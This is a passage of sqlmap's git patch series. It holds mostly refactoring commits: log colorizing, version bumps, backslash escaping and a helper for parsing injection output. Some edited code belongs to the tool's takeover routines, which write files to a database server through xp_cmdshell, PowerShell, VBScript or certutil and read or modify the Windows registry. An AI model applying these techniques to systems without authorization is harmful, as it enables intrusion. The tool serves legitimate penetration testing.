b/thirdparty/ansistrm/ansistrm.py index 1299206c09b..e641d43cc2d 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -164,7 +164,7 @@ def colorize(self, message, levelno): time = match.group(1) if not message.endswith(self.reset): reset = self.reset - elif message.startswith(self.bold): # bold + elif self.bold in message: # bold reset = self.reset + self.bold else: reset = self.reset @@ -175,11 +175,22 @@ def colorize(self, message, levelno): counter = match.group(1) if not message.endswith(self.reset): reset = self.reset - elif message.startswith(self.bold): # bold + elif self.bold in message: # bold reset = self.reset + self.bold else: reset = self.reset message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) + + match = re.search(r"'([^']+)'", message) # single-quoted + if match: + string = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif self.bold in message: # bold + reset = self.reset + self.bold + else: + reset = self.reset + message = message.replace(string, ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) else: message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c936dc4bb88..58aa0ba794c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4c4a8178e4fd6e1fa8225c8c08815cd0 lib/core/settings.py +dca7833ecd9019b230cb281eddb83c34 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -285,7 +285,7 @@ fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py 3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -641fc9d8f1f8ccb4488f717668422c21 thirdparty/ansistrm/ansistrm.py +b307cd108a5f0d365bfab935d867123c thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From 5f1bae86b0a299e831c7fefcc3735024922aab43 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 19 Jul 2018 18:00:56 +0200 Subject: [PATCH 212/428] Fixes #3194 --- lib/core/common.py | 2 -- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 48af95c4f75..10a9b0ebb08 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1317,8 +1317,6 @@ def parseTargetDirect(): if not conf.direct: return - conf.direct = conf.direct.encode(UNICODE_ENCODING) # some DBMS connectors (e.g. pymssql) don't like Unicode with non-US letters - details = None remote = False diff --git a/lib/core/settings.py b/lib/core/settings.py index dcad0b64c87..09aadcf6033 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.19" +VERSION = "1.2.7.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 58aa0ba794c..5fcb4db9055 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -b703bb5160945067a36c6827c34e1624 lib/core/common.py +2131176e2fca7d400ccd0e2da6f8b77b lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dca7833ecd9019b230cb281eddb83c34 lib/core/settings.py +59ebdd0d032d8110419c4e4b84c869b6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py From 22c7bc54b453d82b0911d543bc7725ae82ecac83 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 27 Jul 2018 00:01:23 +0200 Subject: [PATCH 213/428] Minor patch --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 09aadcf6033..2411df56f6e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.20" +VERSION = "1.2.7.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index e641d43cc2d..346e0d3cb3d 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -182,7 +182,7 @@ def colorize(self, message, levelno): message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) match = re.search(r"'([^']+)'", message) # single-quoted - if match: + if level != "PAYLOAD" and match: string = match.group(1) if not message.endswith(self.reset): reset = self.reset diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5fcb4db9055..eb7ad959495 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -59ebdd0d032d8110419c4e4b84c869b6 lib/core/settings.py +475b8df4fbbb3b5108ccb1e856fe2a61 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -285,7 +285,7 @@ fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py 3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -b307cd108a5f0d365bfab935d867123c thirdparty/ansistrm/ansistrm.py +b25b47ddeeb62e5857fd5ad17fd454b5 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From 1e60378fb2d9d4e5a10b092db62db2743b9268a9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 27 Jul 2018 00:30:30 +0200 Subject: [PATCH 214/428] Minor refactoring --- lib/core/common.py | 14 ++++++++------ lib/core/settings.py | 2 +- lib/takeover/xp_cmdshell.py | 2 +- plugins/dbms/mssqlserver/filesystem.py | 22 +++++++++++----------- plugins/generic/takeover.py | 8 ++++---- txt/checksum.md5 | 10 +++++----- 6 files changed, 30 insertions(+), 28 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 10a9b0ebb08..db48c0b2808 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1297,7 +1297,7 @@ def setPaths(rootPath): paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml") for path in paths.values(): - if any(path.endswith(_) for _ in (".txt", ".xml", ".zip")): + if any(path.endswith(_) for _ in (".md5", ".txt", ".xml", ".zip")): checkFile(path) def weAreFrozen(): @@ -1427,7 +1427,7 @@ def parseTargetUrl(): errMsg += "on this platform" raise SqlmapGenericException(errMsg) - if not re.search(r"^http[s]*://", conf.url, re.I) and not re.search(r"^ws[s]*://", conf.url, re.I): + if not re.search(r"^https?://", conf.url, re.I) and not re.search(r"^wss?://", conf.url, re.I): if re.search(r":443\b", conf.url): conf.url = "https://%s" % conf.url else: @@ -1528,14 +1528,14 @@ def expandAsteriskForColumns(expression): the SQL query string (expression) """ - asterisk = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+`?([^`\s()]+)", expression) + match = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+`?([^`\s()]+)", expression) - if asterisk: + if match: infoMsg = "you did not provide the fields in your query. " infoMsg += "sqlmap will retrieve the column names itself" logger.info(infoMsg) - _ = asterisk.group(2).replace("..", '.').replace(".dbo.", '.') + _ = match.group(2).replace("..", '.').replace(".dbo.", '.') db, conf.tbl = _.split('.', 1) if '.' in _ else (None, _) if db is None: @@ -4284,9 +4284,11 @@ def extractExpectedValue(value, expected): value = value.strip().lower() if value in ("true", "false"): value = value == "true" + elif value in ('t', 'f'): + value = value == 't' elif value in ("1", "-1"): value = True - elif value == "0": + elif value == '0': value = False else: value = None diff --git a/lib/core/settings.py b/lib/core/settings.py index 2411df56f6e..e62570a4f63 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.21" +VERSION = "1.2.7.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index 19b06d8e80f..e2f92441d3f 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -136,7 +136,7 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile): for line in lines: echoedLine = "echo %s " % line - echoedLine += ">> \"%s\%s\"" % (tmpPath, randDestFile) + echoedLine += ">> \"%s\\%s\"" % (tmpPath, randDestFile) echoedLines.append(echoedLine) for echoedLine in echoedLines: diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py index c94f70f4fd1..6da84d561d1 100644 --- a/plugins/dbms/mssqlserver/filesystem.py +++ b/plugins/dbms/mssqlserver/filesystem.py @@ -67,11 +67,11 @@ def _updateDestChunk(self, fileContent, tmpPath): chunkName = randomStr(lowercase=True) fileScrLines = self._dataToScr(fileContent, chunkName) - logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr)) + logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr)) self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) - logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr)) + logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr)) commands = ( "cd \"%s\"" % tmpPath, @@ -174,10 +174,10 @@ def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType): encodedFileContent = base64encode(wFileContent) encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) - encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File) + encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) - randPSScriptPath = "%s\%s" % (tmpPath, randPSScript) + randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) wFileSize = len(encodedFileContent) chunkMaxSize = 1024 @@ -212,15 +212,15 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp logger.info(infoMsg) dFileName = ntpath.basename(dFile) - sFile = "%s\%s" % (tmpPath, dFileName) + sFile = "%s\\%s" % (tmpPath, dFileName) wFileSize = os.path.getsize(wFile) debugSize = 0xFF00 if wFileSize < debugSize: chunkName = self._updateDestChunk(wFileContent, tmpPath) - debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType) - debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile) + debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType) + debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, dFileName, dFile) logger.debug(debugMsg) commands = ( @@ -248,7 +248,7 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp debugMsg = "appending chunk " copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName) - debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) + debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) logger.debug(debugMsg) commands = ( @@ -275,7 +275,7 @@ def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) - randFilePath = "%s\%s" % (tmpPath, randFile) + randFilePath = "%s\\%s" % (tmpPath, randFile) vbs = """Dim inputFilePath, outputFilePath inputFilePath = "%s" @@ -338,7 +338,7 @@ def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) - logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs)) + logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs)) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) @@ -359,7 +359,7 @@ def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, file chunkMaxSize = 500 randFile = "tmpf%s.txt" % randomStr(lowercase=True) - randFilePath = "%s\%s" % (tmpPath, randFile) + randFilePath = "%s\\%s" % (tmpPath, randFile) encodedFileContent = base64encode(wFileContent) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index f65928a13be..e53eeedd1d9 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -372,7 +372,7 @@ def regRead(self): else: regVal = conf.regVal - infoMsg = "reading Windows registry path '%s\%s' " % (regKey, regVal) + infoMsg = "reading Windows registry path '%s\\%s' " % (regKey, regVal) logger.info(infoMsg) return self.readRegKey(regKey, regVal, True) @@ -417,7 +417,7 @@ def regAdd(self): else: regType = conf.regType - infoMsg = "adding Windows registry path '%s\%s' " % (regKey, regVal) + infoMsg = "adding Windows registry path '%s\\%s' " % (regKey, regVal) infoMsg += "with data '%s'. " % regData infoMsg += "This will work only if the user running the database " infoMsg += "process has privileges to modify the Windows registry." @@ -449,12 +449,12 @@ def regDel(self): regVal = conf.regVal message = "are you sure that you want to delete the Windows " - message += "registry path '%s\%s? [y/N] " % (regKey, regVal) + message += "registry path '%s\\%s? [y/N] " % (regKey, regVal) if not readInput(message, default='N', boolean=True): return - infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal) + infoMsg = "deleting Windows registry path '%s\\%s'. " % (regKey, regVal) infoMsg += "This will work only if the user running the database " infoMsg += "process has privileges to modify the Windows registry." logger.info(infoMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index eb7ad959495..04509aaa51c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -2131176e2fca7d400ccd0e2da6f8b77b lib/core/common.py +de53dd81bda04541d0992852aee0f2b3 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -475b8df4fbbb3b5108ccb1e856fe2a61 lib/core/settings.py +9c991557b5b0a38f14c5667d627ead76 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -88,7 +88,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py -f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py +debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py 09beb19c2ec9fdd14329f1c0b59a2d05 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py @@ -163,7 +163,7 @@ e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py decc645344bb93aca504a71ba2e4cad4 plugins/dbms/mssqlserver/connector.py f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py -177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py +65911fdc86fa6322e72319e6488a0bb8 plugins/dbms/mssqlserver/filesystem.py 08914da79141713bd69a25c3cc7f06a8 plugins/dbms/mssqlserver/fingerprint.py f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py @@ -214,7 +214,7 @@ f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py -e522c294676ede15bee751107e9bb449 plugins/generic/takeover.py +4adc07051b727f1525cf0a2d619221f8 plugins/generic/takeover.py 4419b13a4b78d7e9e4a2632302344a1a plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ From f63ceaa0c17085ea11521c4d3435ceded20bd34e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 27 Jul 2018 00:53:14 +0200 Subject: [PATCH 215/428] Minor refactoring --- lib/core/common.py | 10 ++++++++++ lib/core/settings.py | 2 +- lib/techniques/error/use.py | 20 ++++++++++---------- lib/techniques/union/use.py | 6 +++++- txt/checksum.md5 | 8 ++++---- 5 files changed, 30 insertions(+), 16 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index db48c0b2808..920d6563044 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4702,3 +4702,13 @@ def safeVariableNaming(value): def unsafeVariableNaming(value): return re.sub(r"%s([0-9a-f]{2})" % SAFE_VARIABLE_MARKER, lambda match: match.group(1).decode("hex"), value) + +def firstNotNone(*args): + retVal = None + + for _ in args: + if _ is not None: + retVal = _ + break + + return retVal diff --git a/lib/core/settings.py b/lib/core/settings.py index e62570a4f63..c5a6196ec69 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.22" +VERSION = "1.2.7.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 6aac89350ef..0674f38d6f7 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -16,6 +16,7 @@ from lib.core.common import dataToStdout from lib.core.common import decodeHexValue from lib.core.common import extractRegexResult +from lib.core.common import firstNotNone from lib.core.common import getConsoleWidth from lib.core.common import getPartRun from lib.core.common import getUnicode @@ -102,7 +103,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False): try: while True: check = r"(?si)%s(?P.*?)%s" % (kb.chars.start, kb.chars.stop) - trimcheck = r"(?si)%s(?P[^<\n]*)" % kb.chars.start + trimCheck = r"(?si)%s(?P[^<\n]*)" % kb.chars.start if field: nulledCastedField = agent.nullAndCastField(field) @@ -133,22 +134,21 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False): # Parse the returned page to get the exact error-based # SQL injection output - output = reduce(lambda x, y: x if x is not None else y, ( + output = firstNotNone( extractRegexResult(check, page), extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), - extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), - None + extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) ) if output is not None: output = getUnicode(output) else: - trimmed = ( - extractRegexResult(trimcheck, page) or - extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) or - extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) or - extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) + trimmed = firstNotNone( + extractRegexResult(trimCheck, page), + extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), + extractRegexResult(trimCheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), + extractRegexResult(trimCheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) ) if trimmed: @@ -163,7 +163,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False): output = extractRegexResult(check, trimmed, re.IGNORECASE) if not output: - check = "(?P[^\s<>'\"]+)" + check = r"(?P[^\s<>'\"]+)" output = extractRegexResult(check, trimmed, re.IGNORECASE) else: output = output.rstrip() diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 30c986d4b41..1e65f67dcfb 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -19,6 +19,7 @@ from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import extractRegexResult +from lib.core.common import firstNotNone from lib.core.common import flattenValue from lib.core.common import getConsoleWidth from lib.core.common import getPartRun @@ -90,7 +91,10 @@ def _oneShotUnionUse(expression, unpack=True, limited=False): # Parse the returned page to get the exact UNION-based # SQL injection output def _(regex): - return reduce(lambda x, y: x if x is not None else y, (extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), None) + return firstNotNone( + extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), + extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE) + ) # Automatically patching last char trimming cases if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 04509aaa51c..3fc726e5da6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -de53dd81bda04541d0992852aee0f2b3 lib/core/common.py +14689a69e8c4447cc117703bb89489ad lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9c991557b5b0a38f14c5667d627ead76 lib/core/settings.py +23138239bf2e6e9a5c2e383862a6fe59 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -95,11 +95,11 @@ debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py 48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -b9f6148c8df6b9d3316ce082dc1a63dd lib/techniques/error/use.py +350d39006cf94151738a95c8d92caa28 lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py -8b770864bdb106ef50c70173c824395c lib/techniques/union/use.py +bfa5bcc4058eeb05c07f6e50f91952b6 lib/techniques/union/use.py 77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py From 39108bc100da4873f36f989e76cf93e274bd2818 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 27 Jul 2018 00:59:24 +0200 Subject: [PATCH 216/428] Trivial refactoring of unused variables --- lib/core/settings.py | 2 +- lib/techniques/blind/inference.py | 2 -- lib/techniques/error/use.py | 1 - lib/techniques/union/use.py | 1 - txt/checksum.md5 | 8 ++++---- 5 files changed, 5 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c5a6196ec69..29fa5237f67 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.23" +VERSION = "1.2.7.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 2ed93597b2c..4dca1afb4e2 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -472,7 +472,6 @@ def blindThread(): currentCharIndex = threadData.shared.index[0] if kb.threadContinue: - start = time.time() val = getChar(currentCharIndex, asciiTbl, not(charsetType is None and conf.charset)) if val is None: val = INFERENCE_UNKNOWN_CHAR @@ -553,7 +552,6 @@ def blindThread(): while True: index += 1 - start = time.time() # Common prediction feature (a.k.a. "good samaritan") # NOTE: to be used only when multi-threading is not set for diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 0674f38d6f7..08399cca49b 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -402,7 +402,6 